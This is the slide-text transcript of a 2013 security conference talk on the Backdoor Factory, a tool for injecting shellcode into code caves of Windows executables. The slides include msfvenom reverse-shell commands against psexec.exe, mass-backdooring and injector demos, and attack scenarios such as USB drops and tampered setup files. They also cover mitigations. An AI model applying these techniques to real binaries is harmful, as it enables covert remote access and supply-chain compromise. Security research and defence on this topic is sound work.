SlideShare a Scribd company logo
Patching Windows Executables
with the Backdoor Factory
Joshua Pitts
DerbyCon 2013
Other Potential Titles
• I’M DOWN WITH APT (yeah you know me)
• Lassie, did Timmy fall in a Code Cave again??
• Why I Cyber and How You Can Cyber too
• When ET met EMET (A Love Story)
• Hugging Your Way to the Top, One Hug at a
Time
• How I Owned Your Mother
About Me
• US Marine, Pre-911: SIGINT
• Past: IT and Physical Security Auditor,
Operational Security Lead, Malware and
Forensic Analyst
• Current: Reverse Engineer, Pentester
• Python, C/C++, ASM (INTEL)
• I have certs.. Serious inquires only :P
• Currently work at Leviathan Security Group
Urban Dictionary
Overview
• History of Patching
• How I learned to patch binaries
• The Backdoor Factory
– Features
– Capabilities
• Demos (Live and Video)
• Mitigations
• Going forward
What is Patching
Definition (Wikipedia):
A patch is a piece of software designed to fix
problems with, or update a computer program
or its supporting data. This includes fixing
security vulnerabilities and other bugs, and
improving the usability or performance.
For This Presentation
My Definition:
Adding or taking away content or functionality
to a compiled binary.
Security Pros and Patching
• Red Teaming
– persistence in plain sight
• Pentesting/Social Engineering
– Salt all the parking lots!
• Research
– Just because :D
• Malware/Code analysis
– Break the anti-analysis code
History of Patching
Good thing we don’t do this with operating systems.
The MS Method
• MSP – Windows install patch file.
• Contains at least two data transforms
– One updates the install database
– One has info that the installer uses for ‘patching
files’
• The installer will then use this info to apply
the patch from the cabinet file
• Yada Yada Yada…
What does this mean?
MS definition of patching is replacing old
registry entries, dlls, and exes with new items
Not the patching that we’re taking about today
How Key Gens/Crackers do it
• Find code branch(es) that validate(s) the
software’s protection mechanism(s)
• Make it return to a value that meets a valid
condition for approved/continued operation
• Sometimes its a function that returns a
True/False (0/1) value after the check.
How Metasploit Patches
• msfvenom –p windows/shell_reverse_tcp –x
psexec.exe … The overwrite program entry
method
• msfvenom –p windows/shell_reverse_tcp –x
psexec.exe –k … The allocate and create
thread and return to original program entry
method (Keep)
MSF Overwrite program Entry - Before
MSF Overwrite program Entry - After
Pros/Cons
• PRO: Attacker receives a shell (or 17) :D
• PRO: Size of EXE not changed
• CON: No continued execution of program
– WIN - LOSE
MSF Create Thread Method (Keep)
When debugging in Immunity Debugger
MSF Create Thread Method (Keep)
Immunity is telling the truth, memory sections:
Original memory sections:
Msfvenom x32 Keep Method
Explained
• Two separate functions or stubs
• Part Two: The shellcode payloads that we all
know
• Part One: Is not new, not so well known, but is
awesome
• Looks like an un-named section of code that
has RWE attributes (very suspicious)
• Very important for stager payloads
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Pros And Cons of the Msfvenom Keep
Method
• PRO: Attacker receives shell and the binary
works ‘normally’ for the user
– That’s a WIN-WIN
• CON: Should be easy for AV to catch
• CON: Size of binary has increased
MSFVenom Win64 Patching Support
Only supports x32
– Submitted a bug post on security street
– A feature request was submitted (#8383):
PE/COFF
The Portable Executable Format
MS-DOS 2.0 HEADER
and unused space
OEM ID/INFO
OFFSET to PE header
MS-DOS 2.0 Stub and Reloc
table
And unused Space
PE Header
Section Headers
Import pages
(import/export info
Base reloc info
Resource info)
• Not much has changed in the last 20 or so years
• Must be backwards compatible (win8 must read
the header)
• Easy to automatically manipulate
• http://msdn.microsoft.com/library/windows/har
dware/gg463125
The Common Object File Format
(COFF) Format
Microsoft COFF Header
(machine type, number
of sections, etc..)
Section Headers
Raw Data
Code
Data
Debug Info
Relocations
• This is included in the PE File Format
• The most important section for RE
• Includes:
- Machine Type
- Number of Sections
- Size and Access (RWE) of Sections
• Typically includes the rest of the file Code,
Data, Debug, Reloc (the actual sections)
End of PE/COFF
How I learned to Backdoor Windows
Binaries
• Though the Offensive Security Cracking the Perimeter
course
– Duh
• Manual Labor
• Time Consuming
– At first hours
– Now about 10-15 mintues
• Missing some important concepts:
– Working with the import table
– Working with staged payloads (stagers)
– Multi cave jumping
– win32 only (slight differences in x64 asm)
CTP Methods
• Append a new section of code
– Similar to the Metasploit msfvenom keep
– Named RWX section (e.g. .sdata, .moo, .what,
etc…)
• Use existing code caves for encoding/decoding
shellcode in the appended section
– We looked at XOR encoding
– XOR encoding is no longer effective against AV
CTP Method
Code Caves?
Code Caves?
A code cave is an area of bytes in a binary that
contain a null byte pattern (x00) greater than
two bytes.
How are code caves created?
• Not sure, so I did some research…
• Or went on a quest…
How are code caves created?
• Starting out, I assumed that a unicorn would
know everything.
• So I went to defcon.
• And what’s better than a unicorn at
DEFCON!!!
How are code caves created?
Hi Unicorn!
Hi.. err, human!
How are code
caves made?
I don’t know.

Aww. Want a
beer?

Pssst… Check
compliers…
o/
How are code caves created?
Tested the following x32 compilers:
• G++ - GNU C++
• Cl.exe – MS compiler linker.
• Lcc-win32
• Mingw32-c++
How are code caves created?
Against this code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
int array[600] = {0};
int main(int argc, char **argv)
{
printf("hello world");
return 0;
}
This Code is FREE as in BEER.
Find Code Caves Demo
Code: http://github.com/secretsquirrel/the-backdoor-factory
Binaries: http://live.sysinternals.com
How Are Code Caves Created?
Results for code caves greater than 200 bytes in
named sections (e.g. .text, .data, .idata, etc…):
• Cl.exe : 7
• G++: 4
• Mingw32-c++: 3
• Lcc-win32: 0
How Are Code Caves Created?
• Remember this line of code:
– int array[600] = {0};
• Not one had a cave of at least 600 bytes.
How Are Code Caves Created?
Lesson:
If you want to minimize code caves in your code, carefully
pick your compiler.**
**More research could be done in this area.***
***I don’t write compilers****
****Nor do I want too…
…yet :P
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Some Ideas
• Automation
• Split shellcode into smaller sections
• Use multiple code caves
• Non-sequential cave jumping
• Use user provided shellcode
• Combine the Metasploit Stager solution with
the CTP code cave use
Solution: BDF
• x32 version released in March 2013
– Supported only single cave jumping
– No x32 stagers support
• Python27 - Single Script
• Supports win32/64
– Supports x32 stagers
– No stagers payloads for x64 yet. (Remember that bug feature
request?)
• Code Cave injection (single and multiple)
• Support user-provided shellcode
• Some Randomization (different hash every time an EXE is created)
– Through random one’s compliment in the code
– And different types of nops
• Injector Module
How BDF works
• Enumerates PE/COFF Header format
• Determines if binary is supported (win32/64
intel)
• Locates code caves that correspond to size of
shellcode
• Patches executable in an attempt to return
registers/flags to the original state for continued
execution
– Patches entry location with a JMP to the first selected
code cave/appended section
– Patches each user selected code cave
How BDF works
• Very primitive disassembler to do just what
we need
• Reworked the x32 msfvenom stager ‘keep’
stub to work in code caves and with user
provided shellcode
-x64 stager support is in the works
• Reworked a handful of useful metasploit
payloads to allow for multiple code cave
jumping
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Original Way BDF Worked
Now You Can Do This
Or This
Demos
• Support Check (Live)
• Backdooring win32/64 binaries (Live)
– Append code cave
– Single code caving
– Code Cave jumping
• Mass backdooring (directory) - Live
• Provide your own shellcode - Live
• Prototyping shellcode (video)
• The injector module (video)
DEMO – Support Check
• If not supported, then what?
• Email me with the disassembly of the entry
function (from a legitimate email)
• I’ll send you the opcode update
DEMO - Patch a file with shellcode
win32/64
• Append
• Pick a single Cave
• Multi-Jumps
• Note – Non-stager payloads will ‘hang’ if C2 is
not available
– Payloads are patched ‘in-line’ and not run in a
separate thread
DEMO - Mass backdooring (directory)
DEMO - Prototyping shellcode
DEMO – Injector Module
• Injector is the hunt and backdoor binary of
doom.
• Use responsibly
DEMO - Provide your own shellcode
• Can be anything, just make sure it matches
the process type (x32 for x32)
• Make sure you use ExitFunction=Thread or
you will kill the parent process (not good)
Attack Scenarios or Methods
• Salting Parking Lots with USBs
• Hosting Rouge Exes
• Attacking system services
• Linux Setuid Attack for Windows
– Patching binaries that require elevated perms but
might be in non-admin directories
• Sysinternal tools
• Setup files
Mitigations
• UPX encoding
• Self Validation
• AVs
• EMET 4.0+
• Hash verification
• White Listing
Mitigations - UPX Encoding
• Not supported by BDF
• Unpack – Patch – Pack
• UPX is not protection against patching
• Could opens your up your Exe to potential
weaknesses
– Are you unpacking to unprotected memory space?
Mitigations - Self Validation
• Team Viewer
• Round Robin Checking
• Find the check, patch it
Mitigations – Anti-Virus’
• I broke the “rule” and uploaded my samples to
Virustotal for this presentation
• It really doesn’t matter
• AV is dead
MSFVENOM keep vs MSVENOM non-keep vs
BDF Cave Jumping
MSFVENOM –k –t exe
Hash: 6d0cb53a4fa983287310260f5c8659ab6c3a761ef8dbd147cf2cfd9e971f4295
MSFVENOM keep vs MSVENOM non-keep vs
BDF Cave Jumping
MSFVENOM –t exe
Hash: 6d0cb53a4fa983287310260f5c8659ab6c3a761ef8dbd147cf2cfd9e971f4295
MSFVENOM keep vs MSVENOM non-keep vs
BDF Cave Jumping
BDF Cave jumping
Hash: 5620ba8c64ff0d9cde65eda4156fbb85186f2bd0f16636cded5c9a0d8024d4e9
win32 BDF vs win64 BDF
ZoomIt.exe vs ZoomIt64.exe
EMET 4.0+ FTW?
• If you use position-independent shellcode
(metasploit)
• And the target binary is protected by EMET…
• And the Caller protection setting is enabled…
• And the application is running as win32…
• EMET will stop this type of attack!
EMET 4.0+ FTW?
• If the binary executes as a win64 process
• EMET will not stop this type of attack!
From the EMET 4.0 User Guide:
Mitigations - Whitelisting
• Based on what you’ve seen today, why would
you use trust AV.
• There are whitelisting vendors, I’m not
endorsing any of them
• I did not test it, but they “should” work – if
based on hashing verification and not name
• Not the end game solution (e.g. powershell
memory injection)
Enterprise Mitigations
• Don’t let end users download binaries
• Verify Your Binaries before Deploying
– Verify hashes
– Conduct forensic analysis and testing
– Look at network traffic
– Etc…
Road Map
• x64 stub to support staged payloads
• Support Mach-O and ELF formats
• Patch the IAT and api pointers to shorten
required shellcode and elimiate ROP-like calls
• MITM patching of binaries during download
Progress on x64 Stager
Questions?

More Related Content

What's hot

The Low-Risk Path to Building Autonomous Car Architectures
The Low-Risk Path to Building Autonomous Car ArchitecturesThe Low-Risk Path to Building Autonomous Car Architectures
The Low-Risk Path to Building Autonomous Car Architectures
Real-Time Innovations (RTI)
 
Unix And Shell Scripting
Unix And Shell ScriptingUnix And Shell Scripting
Unix And Shell Scripting
Jaibeer Malik
 
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardKernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Anne Nicolas
 
Lecture 7 cuda execution model
Lecture 7   cuda execution modelLecture 7   cuda execution model
Lecture 7 cuda execution model
Vajira Thambawita
 
Linux Performance Analysis and Tools
Linux Performance Analysis and ToolsLinux Performance Analysis and Tools
Linux Performance Analysis and Tools
Brendan Gregg
 
Tech Talk NVIDIA CUDA
Tech Talk NVIDIA CUDATech Talk NVIDIA CUDA
Tech Talk NVIDIA CUDA
Jens Rühmkorf
 
Bypassing nac solutions and mitigations
Bypassing nac solutions and mitigationsBypassing nac solutions and mitigations
Bypassing nac solutions and mitigations
Suraj Khetani
 
CNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationCNIT 123: 6: Enumeration
CNIT 123: 6: Enumeration
Sam Bowne
 
StackOverflow Architectural Overview
StackOverflow Architectural OverviewStackOverflow Architectural Overview
StackOverflow Architectural Overview
Folio3 Software
 
How to Use Telegraf and Its Plugin Ecosystem
How to Use Telegraf and Its Plugin EcosystemHow to Use Telegraf and Its Plugin Ecosystem
How to Use Telegraf and Its Plugin Ecosystem
InfluxData
 
Linux Kernel Startup Code In Embedded Linux
Linux    Kernel    Startup  Code In  Embedded  LinuxLinux    Kernel    Startup  Code In  Embedded  Linux
Linux Kernel Startup Code In Embedded Linux
Emanuele Bonanni
 
Launch the First Process in Linux System
Launch the First Process in Linux SystemLaunch the First Process in Linux System
Launch the First Process in Linux System
Jian-Hong Pan
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
 
AI and Machine Learning for Analyzing Cryptocurrencies and the Blockchain
AI and Machine Learning for Analyzing Cryptocurrencies and the BlockchainAI and Machine Learning for Analyzing Cryptocurrencies and the Blockchain
AI and Machine Learning for Analyzing Cryptocurrencies and the Blockchain
Rakuten Group, Inc.
 
Embedded Operating System - Linux
Embedded Operating System - LinuxEmbedded Operating System - Linux
Embedded Operating System - Linux
Emertxe Information Technologies Pvt Ltd
 
4. Memory virtualization and management
4. Memory virtualization and management4. Memory virtualization and management
4. Memory virtualization and management
Hwanju Kim
 
Property-Based TPM Virtualization
Property-Based TPM VirtualizationProperty-Based TPM Virtualization
Property-Based TPM Virtualization
Marcel Winandy
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
System calls
System callsSystem calls
System calls
AfshanKhan51
 
LF_DPDK_Mellanox bifurcated driver model
LF_DPDK_Mellanox bifurcated driver modelLF_DPDK_Mellanox bifurcated driver model
LF_DPDK_Mellanox bifurcated driver model
LF_DPDK
 

What's hot (20)

The Low-Risk Path to Building Autonomous Car Architectures
The Low-Risk Path to Building Autonomous Car ArchitecturesThe Low-Risk Path to Building Autonomous Car Architectures
The Low-Risk Path to Building Autonomous Car Architectures
 
Unix And Shell Scripting
Unix And Shell ScriptingUnix And Shell Scripting
Unix And Shell Scripting
 
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardKernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
 
Lecture 7 cuda execution model
Lecture 7   cuda execution modelLecture 7   cuda execution model
Lecture 7 cuda execution model
 
Linux Performance Analysis and Tools
Linux Performance Analysis and ToolsLinux Performance Analysis and Tools
Linux Performance Analysis and Tools
 
Tech Talk NVIDIA CUDA
Tech Talk NVIDIA CUDATech Talk NVIDIA CUDA
Tech Talk NVIDIA CUDA
 
Bypassing nac solutions and mitigations
Bypassing nac solutions and mitigationsBypassing nac solutions and mitigations
Bypassing nac solutions and mitigations
 
CNIT 123: 6: Enumeration
CNIT 123: 6: EnumerationCNIT 123: 6: Enumeration
CNIT 123: 6: Enumeration
 
StackOverflow Architectural Overview
StackOverflow Architectural OverviewStackOverflow Architectural Overview
StackOverflow Architectural Overview
 
How to Use Telegraf and Its Plugin Ecosystem
How to Use Telegraf and Its Plugin EcosystemHow to Use Telegraf and Its Plugin Ecosystem
How to Use Telegraf and Its Plugin Ecosystem
 
Linux Kernel Startup Code In Embedded Linux
Linux    Kernel    Startup  Code In  Embedded  LinuxLinux    Kernel    Startup  Code In  Embedded  Linux
Linux Kernel Startup Code In Embedded Linux
 
Launch the First Process in Linux System
Launch the First Process in Linux SystemLaunch the First Process in Linux System
Launch the First Process in Linux System
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
 
AI and Machine Learning for Analyzing Cryptocurrencies and the Blockchain
AI and Machine Learning for Analyzing Cryptocurrencies and the BlockchainAI and Machine Learning for Analyzing Cryptocurrencies and the Blockchain
AI and Machine Learning for Analyzing Cryptocurrencies and the Blockchain
 
Embedded Operating System - Linux
Embedded Operating System - LinuxEmbedded Operating System - Linux
Embedded Operating System - Linux
 
4. Memory virtualization and management
4. Memory virtualization and management4. Memory virtualization and management
4. Memory virtualization and management
 
Property-Based TPM Virtualization
Property-Based TPM VirtualizationProperty-Based TPM Virtualization
Property-Based TPM Virtualization
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
System calls
System callsSystem calls
System calls
 
LF_DPDK_Mellanox bifurcated driver model
LF_DPDK_Mellanox bifurcated driver modelLF_DPDK_Mellanox bifurcated driver model
LF_DPDK_Mellanox bifurcated driver model
 

Viewers also liked

AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
VeilFramework
 
Have You Seen My Malware?
Have You Seen My Malware?Have You Seen My Malware?
Have You Seen My Malware?
midnite_runr
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
Amr Ali
 
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
Abhineet Ayan
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Georg Wicherski
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
Harsh Daftary
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
Alexandre Moneger
 
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycShellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
Z Chen
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode Execution
Ryan Wincey
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Ajin Abraham
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writing
sbha0909
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
Positive Hack Days
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
Vincent Ohprecio
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
Julia Yu-Chin Cheng
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
Ajin Abraham
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
 
Software Exploits
Software ExploitsSoftware Exploits
Software Exploits
KevinCSmallwood
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injection
Dhaval Kapil
 

Viewers also liked (20)

AV Evasion with the Veil Framework
AV Evasion with the Veil FrameworkAV Evasion with the Veil Framework
AV Evasion with the Veil Framework
 
Have You Seen My Malware?
Have You Seen My Malware?Have You Seen My Malware?
Have You Seen My Malware?
 
Design and implementation_of_shellcodes
Design and implementation_of_shellcodesDesign and implementation_of_shellcodes
Design and implementation_of_shellcodes
 
Anatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineeringAnatomy of A Shell Code, Reverse engineering
Anatomy of A Shell Code, Reverse engineering
 
07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters07 - Bypassing ASLR, or why X^W matters
07 - Bypassing ASLR, or why X^W matters
 
Efficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode DetectionEfficient Bytecode Analysis: Linespeed Shellcode Detection
Efficient Bytecode Analysis: Linespeed Shellcode Detection
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
 
05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters05 - Bypassing DEP, or why ASLR matters
05 - Bypassing DEP, or why ASLR matters
 
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycShellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneyc
 
Java Shellcode Execution
Java Shellcode ExecutionJava Shellcode Execution
Java Shellcode Execution
 
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit DevelopmentExploit Research and Development Megaprimer: Unicode Based Exploit Development
Exploit Research and Development Megaprimer: Unicode Based Exploit Development
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
Talking about exploit writing
Talking about exploit writingTalking about exploit writing
Talking about exploit writing
 
Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.Anton Dorfman. Shellcode Mastering.
Anton Dorfman. Shellcode Mastering.
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
 
Shellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and ConceptShellcode Analysis - Basic and Concept
Shellcode Analysis - Basic and Concept
 
Exploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 EgghunterExploit Research and Development Megaprimer: Win32 Egghunter
Exploit Research and Development Megaprimer: Win32 Egghunter
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
 
Software Exploits
Software ExploitsSoftware Exploits
Software Exploits
 
Shellcode injection
Shellcode injectionShellcode injection
Shellcode injection
 

Similar to Patching Windows Executables with the Backdoor Factory | DerbyCon 2013

Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
Peter Hlavaty
 
Typhoon Managed Execution Toolkit
Typhoon Managed Execution ToolkitTyphoon Managed Execution Toolkit
Typhoon Managed Execution Toolkit
Dimitry Snezhkov
 
Unmanaged Parallelization via P/Invoke
Unmanaged Parallelization via P/InvokeUnmanaged Parallelization via P/Invoke
Unmanaged Parallelization via P/Invoke
Dmitri Nesteruk
 
Eusecwest
EusecwestEusecwest
Eusecwest
zynamics GmbH
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.
Shahriman .
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
Alexandre Moneger
 
Surge2012
Surge2012Surge2012
Surge2012
davidapacheco
 
Debugging multiplayer games
Debugging multiplayer gamesDebugging multiplayer games
Debugging multiplayer games
Maciej Siniło
 
One-Byte Modification for Breaking Memory Forensic Analysis
One-Byte Modification for Breaking Memory Forensic AnalysisOne-Byte Modification for Breaking Memory Forensic Analysis
One-Byte Modification for Breaking Memory Forensic Analysis
Takahiro Haruyama
 
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
EC-Council
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
Peter Hlavaty
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
Luis Grangeia
 
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbg
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbgPractical Malware Analysis: Ch 10: Kernel Debugging with WinDbg
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbg
Sam Bowne
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
Vulnerability Inheritance in ICS (English)
Vulnerability Inheritance in ICS (English)Vulnerability Inheritance in ICS (English)
Vulnerability Inheritance in ICS (English)
Digital Bond
 
VB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkVB2013 - Security Research and Development Framework
VB2013 - Security Research and Development Framework
Amr Thabet
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
Royce Davis
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
Alisa Esage Шевченко
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
DefCamp
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
Tiago Henriques
 

Similar to Patching Windows Executables with the Backdoor Factory | DerbyCon 2013 (20)

Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
 
Typhoon Managed Execution Toolkit
Typhoon Managed Execution ToolkitTyphoon Managed Execution Toolkit
Typhoon Managed Execution Toolkit
 
Unmanaged Parallelization via P/Invoke
Unmanaged Parallelization via P/InvokeUnmanaged Parallelization via P/Invoke
Unmanaged Parallelization via P/Invoke
 
Eusecwest
EusecwestEusecwest
Eusecwest
 
Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.Common technique in Bypassing Stuff in Python.
Common technique in Bypassing Stuff in Python.
 
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
 
Surge2012
Surge2012Surge2012
Surge2012
 
Debugging multiplayer games
Debugging multiplayer gamesDebugging multiplayer games
Debugging multiplayer games
 
One-Byte Modification for Breaking Memory Forensic Analysis
One-Byte Modification for Breaking Memory Forensic AnalysisOne-Byte Modification for Breaking Memory Forensic Analysis
One-Byte Modification for Breaking Memory Forensic Analysis
 
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
 
Security research over Windows #defcon china
Security research over Windows #defcon chinaSecurity research over Windows #defcon china
Security research over Windows #defcon china
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
 
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbg
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbgPractical Malware Analysis: Ch 10: Kernel Debugging with WinDbg
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbg
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
Vulnerability Inheritance in ICS (English)
Vulnerability Inheritance in ICS (English)Vulnerability Inheritance in ICS (English)
Vulnerability Inheritance in ICS (English)
 
VB2013 - Security Research and Development Framework
VB2013 - Security Research and Development FrameworkVB2013 - Security Research and Development Framework
VB2013 - Security Research and Development Framework
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
 
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
Hunting and Exploiting Bugs in Kernel Drivers - DefCamp 2012
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
 

Recently uploaded

